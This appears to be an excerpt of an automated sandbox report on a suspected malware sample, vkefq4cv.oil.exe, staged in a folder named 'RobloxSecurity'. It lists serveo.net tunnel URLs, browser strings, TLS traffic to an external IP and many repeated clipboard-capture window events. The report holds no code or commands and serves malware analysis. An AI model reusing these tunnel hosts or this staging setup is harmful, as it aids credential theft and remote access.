Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.se
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B79934000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/
Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net
Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000021.00000002.4113726250.0000029260842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net/
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
